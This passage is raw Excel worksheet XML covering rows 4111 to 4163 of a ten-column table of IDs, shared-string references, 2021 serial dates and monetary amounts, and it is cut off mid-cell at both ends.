        <v>17</v>
      </c>
      <c r="F4111" t="s">
        <v>4686</v>
      </c>
      <c r="G4111" s="1">
        <v>44293</v>
      </c>
      <c r="H4111">
        <v>0</v>
      </c>
      <c r="J4111" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4112" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4112">
        <v>24497</v>
      </c>
      <c r="B4112">
        <v>1638</v>
      </c>
      <c r="C4112" t="s">
        <v>3210</v>
      </c>
      <c r="D4112" t="s">
        <v>13350</v>
      </c>
      <c r="E4112">
        <v>17</v>
      </c>
      <c r="F4112" t="s">
        <v>13351</v>
      </c>
      <c r="G4112" s="1">
        <v>44293</v>
      </c>
      <c r="H4112">
        <v>576000</v>
      </c>
      <c r="I4112" t="s">
        <v>10546</v>
      </c>
      <c r="J4112" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4113" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4113">
        <v>24498</v>
      </c>
      <c r="B4113">
        <v>1638</v>
      </c>
      <c r="C4113" t="s">
        <v>3210</v>
      </c>
      <c r="D4113" t="s">
        <v>13350</v>
      </c>
      <c r="E4113">
        <v>17</v>
      </c>
      <c r="F4113" t="s">
        <v>13352</v>
      </c>
      <c r="G4113" s="1">
        <v>44293</v>
      </c>
      <c r="H4113">
        <v>576000</v>
      </c>
      <c r="I4113" t="s">
        <v>13353</v>
      </c>
      <c r="J4113" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="4114" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4114">
        <v>24499</v>
      </c>
      <c r="B4114">
        <v>1638</v>
      </c>
      <c r="C4114" t="s">
        <v>3210</v>
      </c>
      <c r="D4114" t="s">
        <v>13350</v>
      </c>
      <c r="E4114">
        <v>17</v>
      </c>
      <c r="F4114" t="s">
        <v>9469</v>
      </c>
      <c r="G4114" s="1">
        <v>44293</v>
      </c>
      <c r="H4114">
        <v>2880000</v>
      </c>
      <c r="J4114" t="s">
        <v>9859</v>
      </c>
    </row>
    <row r="4115" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4115">
        <v>24500</v>
      </c>
      <c r="B4115">
        <v>5468</v>
      </c>
      <c r="C4115" t="s">
        <v>8698</v>
      </c>
      <c r="D4115" t="s">
        <v>13354</v>
      </c>
      <c r="E4115">
        <v>16</v>
      </c>
      <c r="F4115" t="s">
        <v>8700</v>
      </c>
      <c r="G4115" s="1">
        <v>44300</v>
      </c>
      <c r="H4115">
        <v>2000</v>
      </c>
      <c r="I4115" t="s">
        <v>13355</v>
      </c>
    </row>
    <row r="4116" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4116">
        <v>24510</v>
      </c>
      <c r="B4116">
        <v>5469</v>
      </c>
      <c r="C4116" t="s">
        <v>8706</v>
      </c>
      <c r="D4116" t="s">
        <v>13356</v>
      </c>
      <c r="E4116">
        <v>16</v>
      </c>
      <c r="F4116" t="s">
        <v>13357</v>
      </c>
      <c r="G4116" s="1">
        <v>44306</v>
      </c>
      <c r="H4116">
        <v>1000</v>
      </c>
      <c r="I4116" t="s">
        <v>13358</v>
      </c>
    </row>
    <row r="4117" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4117">
        <v>24514</v>
      </c>
      <c r="B4117">
        <v>1595</v>
      </c>
      <c r="C4117" t="s">
        <v>16531</v>
      </c>
      <c r="D4117" t="s">
        <v>16532</v>
      </c>
      <c r="E4117">
        <v>26</v>
      </c>
      <c r="F4117" t="s">
        <v>3499</v>
      </c>
      <c r="G4117" s="1">
        <v>44274</v>
      </c>
      <c r="H4117" s="4">
        <v>105000</v>
      </c>
      <c r="J4117" t="s">
        <v>13359</v>
      </c>
    </row>
    <row r="4118" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4118">
        <v>24515</v>
      </c>
      <c r="B4118">
        <v>111</v>
      </c>
      <c r="C4118" t="s">
        <v>2319</v>
      </c>
      <c r="D4118" t="s">
        <v>13104</v>
      </c>
      <c r="E4118">
        <v>12</v>
      </c>
      <c r="F4118" t="s">
        <v>10463</v>
      </c>
      <c r="G4118" s="1">
        <v>44306</v>
      </c>
      <c r="H4118">
        <v>3000000</v>
      </c>
      <c r="J4118" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4119" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4119">
        <v>24516</v>
      </c>
      <c r="B4119">
        <v>111</v>
      </c>
      <c r="C4119" t="s">
        <v>2319</v>
      </c>
      <c r="D4119" t="s">
        <v>13104</v>
      </c>
      <c r="E4119">
        <v>12</v>
      </c>
      <c r="F4119" t="s">
        <v>9460</v>
      </c>
      <c r="G4119" s="1">
        <v>44306</v>
      </c>
      <c r="H4119">
        <v>25000</v>
      </c>
    </row>
    <row r="4120" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4120">
        <v>24517</v>
      </c>
      <c r="B4120">
        <v>111</v>
      </c>
      <c r="C4120" t="s">
        <v>2319</v>
      </c>
      <c r="D4120" t="s">
        <v>13104</v>
      </c>
      <c r="E4120">
        <v>12</v>
      </c>
      <c r="F4120" t="s">
        <v>13360</v>
      </c>
      <c r="G4120" s="1">
        <v>44306</v>
      </c>
      <c r="H4120">
        <v>125000</v>
      </c>
      <c r="J4120" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4121" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4121">
        <v>24518</v>
      </c>
      <c r="B4121">
        <v>111</v>
      </c>
      <c r="C4121" t="s">
        <v>2319</v>
      </c>
      <c r="D4121" t="s">
        <v>13104</v>
      </c>
      <c r="E4121">
        <v>12</v>
      </c>
      <c r="F4121" t="s">
        <v>13361</v>
      </c>
      <c r="G4121" s="1">
        <v>44306</v>
      </c>
      <c r="H4121">
        <v>75000</v>
      </c>
      <c r="J4121" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4122" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4122">
        <v>24519</v>
      </c>
      <c r="B4122">
        <v>102</v>
      </c>
      <c r="C4122" t="s">
        <v>2326</v>
      </c>
      <c r="D4122" t="s">
        <v>13362</v>
      </c>
      <c r="E4122">
        <v>27</v>
      </c>
      <c r="F4122" t="s">
        <v>4686</v>
      </c>
      <c r="G4122" s="1">
        <v>44299</v>
      </c>
      <c r="H4122">
        <v>3000</v>
      </c>
      <c r="I4122" t="s">
        <v>9550</v>
      </c>
      <c r="J4122" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="4123" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4123">
        <v>24520</v>
      </c>
      <c r="B4123">
        <v>102</v>
      </c>
      <c r="C4123" t="s">
        <v>2326</v>
      </c>
      <c r="D4123" t="s">
        <v>13362</v>
      </c>
      <c r="E4123">
        <v>27</v>
      </c>
      <c r="F4123" t="s">
        <v>2236</v>
      </c>
      <c r="G4123" s="1">
        <v>44299</v>
      </c>
      <c r="H4123">
        <v>16000</v>
      </c>
      <c r="I4123" t="s">
        <v>10031</v>
      </c>
      <c r="J4123" t="s">
        <v>13363</v>
      </c>
    </row>
    <row r="4124" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4124">
        <v>24521</v>
      </c>
      <c r="B4124">
        <v>102</v>
      </c>
      <c r="C4124" t="s">
        <v>2326</v>
      </c>
      <c r="D4124" t="s">
        <v>13362</v>
      </c>
      <c r="E4124">
        <v>27</v>
      </c>
      <c r="F4124" t="s">
        <v>13364</v>
      </c>
      <c r="G4124" s="1">
        <v>44299</v>
      </c>
      <c r="H4124">
        <v>20000</v>
      </c>
      <c r="I4124" t="s">
        <v>10031</v>
      </c>
      <c r="J4124" t="s">
        <v>13363</v>
      </c>
    </row>
    <row r="4125" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4125">
        <v>24522</v>
      </c>
      <c r="B4125">
        <v>102</v>
      </c>
      <c r="C4125" t="s">
        <v>2326</v>
      </c>
      <c r="D4125" t="s">
        <v>13362</v>
      </c>
      <c r="E4125">
        <v>27</v>
      </c>
      <c r="F4125" t="s">
        <v>13365</v>
      </c>
      <c r="G4125" s="1">
        <v>44299</v>
      </c>
      <c r="H4125">
        <v>0</v>
      </c>
      <c r="I4125" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4126" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4126">
        <v>24523</v>
      </c>
      <c r="B4126">
        <v>102</v>
      </c>
      <c r="C4126" t="s">
        <v>2326</v>
      </c>
      <c r="D4126" t="s">
        <v>13362</v>
      </c>
      <c r="E4126">
        <v>27</v>
      </c>
      <c r="F4126" t="s">
        <v>13366</v>
      </c>
      <c r="G4126" s="1">
        <v>44299</v>
      </c>
      <c r="H4126">
        <v>18000</v>
      </c>
      <c r="I4126" t="s">
        <v>10031</v>
      </c>
      <c r="J4126" t="s">
        <v>13363</v>
      </c>
    </row>
    <row r="4127" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4127">
        <v>24524</v>
      </c>
      <c r="B4127">
        <v>102</v>
      </c>
      <c r="C4127" t="s">
        <v>2326</v>
      </c>
      <c r="D4127" t="s">
        <v>13362</v>
      </c>
      <c r="E4127">
        <v>27</v>
      </c>
      <c r="F4127" t="s">
        <v>9437</v>
      </c>
      <c r="G4127" s="1">
        <v>44299</v>
      </c>
      <c r="H4127">
        <v>8000</v>
      </c>
      <c r="I4127" t="s">
        <v>10031</v>
      </c>
      <c r="J4127" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4128" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4128">
        <v>24525</v>
      </c>
      <c r="B4128">
        <v>1469</v>
      </c>
      <c r="C4128" t="s">
        <v>4345</v>
      </c>
      <c r="D4128" t="s">
        <v>13367</v>
      </c>
      <c r="E4128">
        <v>12</v>
      </c>
      <c r="F4128" t="s">
        <v>13155</v>
      </c>
      <c r="G4128" s="1">
        <v>44322</v>
      </c>
      <c r="H4128">
        <v>48000</v>
      </c>
      <c r="I4128" t="s">
        <v>9550</v>
      </c>
      <c r="J4128" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4129" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4129">
        <v>24526</v>
      </c>
      <c r="B4129">
        <v>1469</v>
      </c>
      <c r="C4129" t="s">
        <v>4345</v>
      </c>
      <c r="D4129" t="s">
        <v>13367</v>
      </c>
      <c r="E4129">
        <v>12</v>
      </c>
      <c r="F4129" t="s">
        <v>13368</v>
      </c>
      <c r="G4129" s="1">
        <v>44322</v>
      </c>
      <c r="H4129">
        <v>24000</v>
      </c>
      <c r="I4129" t="s">
        <v>9550</v>
      </c>
      <c r="J4129" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4130" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4130">
        <v>24527</v>
      </c>
      <c r="B4130">
        <v>1469</v>
      </c>
      <c r="C4130" t="s">
        <v>4345</v>
      </c>
      <c r="D4130" t="s">
        <v>13367</v>
      </c>
      <c r="E4130">
        <v>12</v>
      </c>
      <c r="F4130" t="s">
        <v>10463</v>
      </c>
      <c r="G4130" s="1">
        <v>44322</v>
      </c>
      <c r="H4130">
        <v>180000</v>
      </c>
      <c r="I4130" t="s">
        <v>9550</v>
      </c>
      <c r="J4130" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4131" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4131">
        <v>24528</v>
      </c>
      <c r="B4131">
        <v>681</v>
      </c>
      <c r="C4131" t="s">
        <v>1571</v>
      </c>
      <c r="D4131" t="s">
        <v>13369</v>
      </c>
      <c r="E4131">
        <v>12</v>
      </c>
      <c r="F4131" t="s">
        <v>9437</v>
      </c>
      <c r="G4131" s="1">
        <v>44274</v>
      </c>
      <c r="H4131">
        <v>100000</v>
      </c>
      <c r="I4131" t="s">
        <v>10312</v>
      </c>
    </row>
    <row r="4132" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4132">
        <v>24529</v>
      </c>
      <c r="B4132">
        <v>681</v>
      </c>
      <c r="C4132" t="s">
        <v>1571</v>
      </c>
      <c r="D4132" t="s">
        <v>13369</v>
      </c>
      <c r="E4132">
        <v>12</v>
      </c>
      <c r="F4132" t="s">
        <v>11532</v>
      </c>
      <c r="G4132" s="1">
        <v>44274</v>
      </c>
      <c r="H4132">
        <v>100000</v>
      </c>
      <c r="I4132" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4133" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4133">
        <v>24530</v>
      </c>
      <c r="B4133">
        <v>681</v>
      </c>
      <c r="C4133" t="s">
        <v>1571</v>
      </c>
      <c r="D4133" t="s">
        <v>13369</v>
      </c>
      <c r="E4133">
        <v>12</v>
      </c>
      <c r="F4133" t="s">
        <v>11227</v>
      </c>
      <c r="G4133" s="1">
        <v>44274</v>
      </c>
      <c r="H4133">
        <v>100000</v>
      </c>
      <c r="I4133" t="s">
        <v>10312</v>
      </c>
    </row>
    <row r="4134" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4134">
        <v>24531</v>
      </c>
      <c r="B4134">
        <v>681</v>
      </c>
      <c r="C4134" t="s">
        <v>1571</v>
      </c>
      <c r="D4134" t="s">
        <v>13369</v>
      </c>
      <c r="E4134">
        <v>12</v>
      </c>
      <c r="F4134" t="s">
        <v>8913</v>
      </c>
      <c r="G4134" s="1">
        <v>44274</v>
      </c>
      <c r="H4134">
        <v>100000</v>
      </c>
      <c r="I4134" t="s">
        <v>10312</v>
      </c>
    </row>
    <row r="4135" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4135">
        <v>24532</v>
      </c>
      <c r="B4135">
        <v>681</v>
      </c>
      <c r="C4135" t="s">
        <v>1571</v>
      </c>
      <c r="D4135" t="s">
        <v>13369</v>
      </c>
      <c r="E4135">
        <v>12</v>
      </c>
      <c r="F4135" t="s">
        <v>9438</v>
      </c>
      <c r="G4135" s="1">
        <v>44274</v>
      </c>
      <c r="H4135">
        <v>100000</v>
      </c>
      <c r="I4135" t="s">
        <v>10312</v>
      </c>
    </row>
    <row r="4136" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4136">
        <v>24533</v>
      </c>
      <c r="B4136">
        <v>681</v>
      </c>
      <c r="C4136" t="s">
        <v>1571</v>
      </c>
      <c r="D4136" t="s">
        <v>13369</v>
      </c>
      <c r="E4136">
        <v>12</v>
      </c>
      <c r="F4136" t="s">
        <v>9435</v>
      </c>
      <c r="G4136" s="1">
        <v>44274</v>
      </c>
      <c r="H4136">
        <v>10000</v>
      </c>
      <c r="I4136" t="s">
        <v>10312</v>
      </c>
    </row>
    <row r="4137" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4137">
        <v>24535</v>
      </c>
      <c r="B4137">
        <v>5140</v>
      </c>
      <c r="C4137" t="s">
        <v>6132</v>
      </c>
      <c r="D4137" t="s">
        <v>13370</v>
      </c>
      <c r="E4137">
        <v>12</v>
      </c>
      <c r="F4137" t="s">
        <v>9437</v>
      </c>
      <c r="G4137" s="1">
        <v>44274</v>
      </c>
      <c r="H4137">
        <v>100000</v>
      </c>
      <c r="I4137" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4138" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4138">
        <v>24536</v>
      </c>
      <c r="B4138">
        <v>5140</v>
      </c>
      <c r="C4138" t="s">
        <v>6132</v>
      </c>
      <c r="D4138" t="s">
        <v>13370</v>
      </c>
      <c r="E4138">
        <v>12</v>
      </c>
      <c r="F4138" t="s">
        <v>9435</v>
      </c>
      <c r="G4138" s="1">
        <v>44274</v>
      </c>
      <c r="H4138">
        <v>10000</v>
      </c>
      <c r="I4138" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4139" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4139">
        <v>24538</v>
      </c>
      <c r="B4139">
        <v>5140</v>
      </c>
      <c r="C4139" t="s">
        <v>6132</v>
      </c>
      <c r="D4139" t="s">
        <v>13370</v>
      </c>
      <c r="E4139">
        <v>12</v>
      </c>
      <c r="F4139" t="s">
        <v>13371</v>
      </c>
      <c r="G4139" s="1">
        <v>44274</v>
      </c>
      <c r="H4139">
        <v>100000</v>
      </c>
      <c r="I4139" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4140" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4140">
        <v>24539</v>
      </c>
      <c r="B4140">
        <v>5140</v>
      </c>
      <c r="C4140" t="s">
        <v>6132</v>
      </c>
      <c r="D4140" t="s">
        <v>13370</v>
      </c>
      <c r="E4140">
        <v>12</v>
      </c>
      <c r="F4140" t="s">
        <v>11227</v>
      </c>
      <c r="G4140" s="1">
        <v>44274</v>
      </c>
      <c r="H4140">
        <v>100000</v>
      </c>
      <c r="I4140" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4141" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4141">
        <v>24540</v>
      </c>
      <c r="B4141">
        <v>5140</v>
      </c>
      <c r="C4141" t="s">
        <v>6132</v>
      </c>
      <c r="D4141" t="s">
        <v>13370</v>
      </c>
      <c r="E4141">
        <v>12</v>
      </c>
      <c r="F4141" t="s">
        <v>8913</v>
      </c>
      <c r="G4141" s="1">
        <v>44274</v>
      </c>
      <c r="H4141">
        <v>100000</v>
      </c>
      <c r="I4141" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4142" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4142">
        <v>24541</v>
      </c>
      <c r="B4142">
        <v>5140</v>
      </c>
      <c r="C4142" t="s">
        <v>6132</v>
      </c>
      <c r="D4142" t="s">
        <v>13370</v>
      </c>
      <c r="E4142">
        <v>12</v>
      </c>
      <c r="F4142" t="s">
        <v>9438</v>
      </c>
      <c r="G4142" s="1">
        <v>44274</v>
      </c>
      <c r="H4142">
        <v>100000</v>
      </c>
      <c r="I4142" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="4143" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4143">
        <v>24544</v>
      </c>
      <c r="B4143">
        <v>1748</v>
      </c>
      <c r="C4143" t="s">
        <v>6461</v>
      </c>
      <c r="D4143" t="s">
        <v>13372</v>
      </c>
      <c r="E4143">
        <v>16</v>
      </c>
      <c r="F4143" t="s">
        <v>1207</v>
      </c>
      <c r="G4143" s="1">
        <v>44337</v>
      </c>
      <c r="H4143">
        <v>131750</v>
      </c>
      <c r="J4143" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="4144" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4144">
        <v>24545</v>
      </c>
      <c r="B4144">
        <v>1690</v>
      </c>
      <c r="C4144" t="s">
        <v>4489</v>
      </c>
      <c r="D4144" t="s">
        <v>13373</v>
      </c>
      <c r="E4144">
        <v>5</v>
      </c>
      <c r="F4144" t="s">
        <v>13374</v>
      </c>
      <c r="G4144" s="1">
        <v>44302</v>
      </c>
      <c r="H4144">
        <v>170000</v>
      </c>
      <c r="I4144" t="s">
        <v>10231</v>
      </c>
      <c r="J4144" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4145" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4145">
        <v>24546</v>
      </c>
      <c r="B4145">
        <v>1690</v>
      </c>
      <c r="C4145" t="s">
        <v>4489</v>
      </c>
      <c r="D4145" t="s">
        <v>13373</v>
      </c>
      <c r="E4145">
        <v>5</v>
      </c>
      <c r="F4145" t="s">
        <v>13375</v>
      </c>
      <c r="G4145" s="1">
        <v>44302</v>
      </c>
      <c r="H4145">
        <v>114000</v>
      </c>
      <c r="I4145" t="s">
        <v>10231</v>
      </c>
      <c r="J4145" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4146" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4146">
        <v>24549</v>
      </c>
      <c r="B4146">
        <v>1393</v>
      </c>
      <c r="C4146" t="s">
        <v>4436</v>
      </c>
      <c r="D4146" t="s">
        <v>13376</v>
      </c>
      <c r="E4146">
        <v>12</v>
      </c>
      <c r="F4146" t="s">
        <v>9437</v>
      </c>
      <c r="G4146" s="1">
        <v>44315</v>
      </c>
      <c r="H4146">
        <v>500000</v>
      </c>
      <c r="I4146" t="s">
        <v>13377</v>
      </c>
    </row>
    <row r="4147" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4147">
        <v>24550</v>
      </c>
      <c r="B4147">
        <v>1393</v>
      </c>
      <c r="C4147" t="s">
        <v>4436</v>
      </c>
      <c r="D4147" t="s">
        <v>13376</v>
      </c>
      <c r="E4147">
        <v>12</v>
      </c>
      <c r="F4147" t="s">
        <v>13378</v>
      </c>
      <c r="G4147" s="1">
        <v>44315</v>
      </c>
      <c r="H4147">
        <v>500000</v>
      </c>
      <c r="I4147" t="s">
        <v>13379</v>
      </c>
    </row>
    <row r="4148" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4148">
        <v>24551</v>
      </c>
      <c r="B4148">
        <v>1393</v>
      </c>
      <c r="C4148" t="s">
        <v>4436</v>
      </c>
      <c r="D4148" t="s">
        <v>13376</v>
      </c>
      <c r="E4148">
        <v>12</v>
      </c>
      <c r="F4148" t="s">
        <v>13380</v>
      </c>
      <c r="G4148" s="1">
        <v>44315</v>
      </c>
      <c r="H4148">
        <v>500000</v>
      </c>
      <c r="I4148" t="s">
        <v>13381</v>
      </c>
    </row>
    <row r="4149" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4149">
        <v>24552</v>
      </c>
      <c r="B4149">
        <v>1393</v>
      </c>
      <c r="C4149" t="s">
        <v>4436</v>
      </c>
      <c r="D4149" t="s">
        <v>13376</v>
      </c>
      <c r="E4149">
        <v>12</v>
      </c>
      <c r="F4149" t="s">
        <v>8913</v>
      </c>
      <c r="G4149" s="1">
        <v>44315</v>
      </c>
      <c r="H4149">
        <v>250000</v>
      </c>
      <c r="I4149" t="s">
        <v>13382</v>
      </c>
    </row>
    <row r="4150" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4150">
        <v>24553</v>
      </c>
      <c r="B4150">
        <v>1453</v>
      </c>
      <c r="C4150" t="s">
        <v>4464</v>
      </c>
      <c r="D4150" t="s">
        <v>13383</v>
      </c>
      <c r="E4150">
        <v>13</v>
      </c>
      <c r="F4150" t="s">
        <v>4950</v>
      </c>
      <c r="G4150" s="1">
        <v>44323</v>
      </c>
      <c r="H4150">
        <v>25000</v>
      </c>
      <c r="J4150" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="4151" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4151">
        <v>24554</v>
      </c>
      <c r="B4151">
        <v>1453</v>
      </c>
      <c r="C4151" t="s">
        <v>4464</v>
      </c>
      <c r="D4151" t="s">
        <v>13383</v>
      </c>
      <c r="E4151">
        <v>13</v>
      </c>
      <c r="F4151" t="s">
        <v>9941</v>
      </c>
      <c r="G4151" s="1">
        <v>44323</v>
      </c>
      <c r="H4151">
        <v>70000</v>
      </c>
      <c r="J4151" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="4152" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4152">
        <v>24555</v>
      </c>
      <c r="B4152">
        <v>1453</v>
      </c>
      <c r="C4152" t="s">
        <v>4464</v>
      </c>
      <c r="D4152" t="s">
        <v>13383</v>
      </c>
      <c r="E4152">
        <v>13</v>
      </c>
      <c r="F4152" t="s">
        <v>9610</v>
      </c>
      <c r="G4152" s="1">
        <v>44323</v>
      </c>
      <c r="H4152">
        <v>0</v>
      </c>
      <c r="J4152" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="4153" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4153">
        <v>24556</v>
      </c>
      <c r="B4153">
        <v>1453</v>
      </c>
      <c r="C4153" t="s">
        <v>4464</v>
      </c>
      <c r="D4153" t="s">
        <v>13383</v>
      </c>
      <c r="E4153">
        <v>13</v>
      </c>
      <c r="F4153" t="s">
        <v>1746</v>
      </c>
      <c r="G4153" s="1">
        <v>44323</v>
      </c>
      <c r="H4153">
        <v>0</v>
      </c>
      <c r="J4153" t="s">
        <v>13384</v>
      </c>
    </row>
    <row r="4154" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4154">
        <v>24557</v>
      </c>
      <c r="B4154">
        <v>1453</v>
      </c>
      <c r="C4154" t="s">
        <v>4464</v>
      </c>
      <c r="D4154" t="s">
        <v>13383</v>
      </c>
      <c r="E4154">
        <v>13</v>
      </c>
      <c r="F4154" t="s">
        <v>13385</v>
      </c>
      <c r="G4154" s="1">
        <v>44323</v>
      </c>
      <c r="H4154">
        <v>0</v>
      </c>
      <c r="J4154" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="4155" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4155">
        <v>24558</v>
      </c>
      <c r="B4155">
        <v>1453</v>
      </c>
      <c r="C4155" t="s">
        <v>4464</v>
      </c>
      <c r="D4155" t="s">
        <v>13383</v>
      </c>
      <c r="E4155">
        <v>13</v>
      </c>
      <c r="F4155" t="s">
        <v>13386</v>
      </c>
      <c r="G4155" s="1">
        <v>44323</v>
      </c>
      <c r="H4155">
        <v>0</v>
      </c>
      <c r="J4155" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="4156" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4156">
        <v>24559</v>
      </c>
      <c r="B4156">
        <v>1453</v>
      </c>
      <c r="C4156" t="s">
        <v>4464</v>
      </c>
      <c r="D4156" t="s">
        <v>13383</v>
      </c>
      <c r="E4156">
        <v>13</v>
      </c>
      <c r="F4156" t="s">
        <v>9435</v>
      </c>
      <c r="G4156" s="1">
        <v>44323</v>
      </c>
      <c r="H4156">
        <v>0</v>
      </c>
      <c r="J4156" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="4157" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4157">
        <v>24560</v>
      </c>
      <c r="B4157">
        <v>10</v>
      </c>
      <c r="C4157" t="s">
        <v>2335</v>
      </c>
      <c r="D4157" t="s">
        <v>13387</v>
      </c>
      <c r="E4157">
        <v>12</v>
      </c>
      <c r="F4157" t="s">
        <v>13388</v>
      </c>
      <c r="G4157" s="1">
        <v>44319</v>
      </c>
      <c r="H4157">
        <v>0</v>
      </c>
      <c r="I4157" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="4158" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4158">
        <v>24561</v>
      </c>
      <c r="B4158">
        <v>10</v>
      </c>
      <c r="C4158" t="s">
        <v>2335</v>
      </c>
      <c r="D4158" t="s">
        <v>13387</v>
      </c>
      <c r="E4158">
        <v>12</v>
      </c>
      <c r="F4158" t="s">
        <v>10028</v>
      </c>
      <c r="G4158" s="1">
        <v>44319</v>
      </c>
      <c r="H4158">
        <v>0</v>
      </c>
      <c r="I4158" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="4159" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4159">
        <v>24562</v>
      </c>
      <c r="B4159">
        <v>2300</v>
      </c>
      <c r="C4159" t="s">
        <v>6317</v>
      </c>
      <c r="D4159" t="s">
        <v>13389</v>
      </c>
      <c r="E4159">
        <v>5</v>
      </c>
      <c r="F4159" t="s">
        <v>3814</v>
      </c>
      <c r="G4159" s="1">
        <v>44321</v>
      </c>
      <c r="H4159">
        <v>5000</v>
      </c>
      <c r="I4159" t="s">
        <v>13390</v>
      </c>
      <c r="J4159" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4160" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4160">
        <v>24569</v>
      </c>
      <c r="B4160">
        <v>1132</v>
      </c>
      <c r="C4160" t="s">
        <v>4389</v>
      </c>
      <c r="D4160" t="s">
        <v>13391</v>
      </c>
      <c r="E4160">
        <v>2</v>
      </c>
      <c r="F4160" t="s">
        <v>4062</v>
      </c>
      <c r="G4160" s="1">
        <v>44354</v>
      </c>
      <c r="H4160">
        <v>8900000</v>
      </c>
      <c r="J4160" t="s">
        <v>13392</v>
      </c>
    </row>
    <row r="4161" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4161">
        <v>24570</v>
      </c>
      <c r="B4161">
        <v>1132</v>
      </c>
      <c r="C4161" t="s">
        <v>4389</v>
      </c>
      <c r="D4161" t="s">
        <v>13391</v>
      </c>
      <c r="E4161">
        <v>2</v>
      </c>
      <c r="F4161" t="s">
        <v>11515</v>
      </c>
      <c r="G4161" s="1">
        <v>44354</v>
      </c>
      <c r="H4161">
        <v>2500000</v>
      </c>
      <c r="J4161" t="s">
        <v>13393</v>
      </c>
    </row>
    <row r="4162" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4162">
        <v>24573</v>
      </c>
      <c r="B4162">
        <v>5432</v>
      </c>
      <c r="C4162" t="s">
        <v>8714</v>
      </c>
      <c r="D4162" t="s">
        <v>13394</v>
      </c>
      <c r="E4162">
        <v>16</v>
      </c>
      <c r="F4162" t="s">
        <v>3204</v>
      </c>
      <c r="G4162" s="1">
        <v>44294</v>
      </c>
      <c r="H4162">
        <v>12000</v>
      </c>
      <c r="J4162" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="4163" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4163">
        <v>24575</v>
      </c>
      <c r="B4163">
        <v>1515</v>
      </c>
      <c r="C4163" t="s">
        <v>4098</v>
      </c>
      <c r="D4163" t="s">
        <v>12923</v>
      </c>
      <c r="E4163">
        <v>12</v>
      </c>
      <c r="F4163" t="s">
        <v>2924</v>
      </c>
      <c r="G4163" s="1">
        <v>44274</v>
      </c>
      <c r="H4163">
        <v>0</v>
      </c>
      <c r="I4163" t="s">
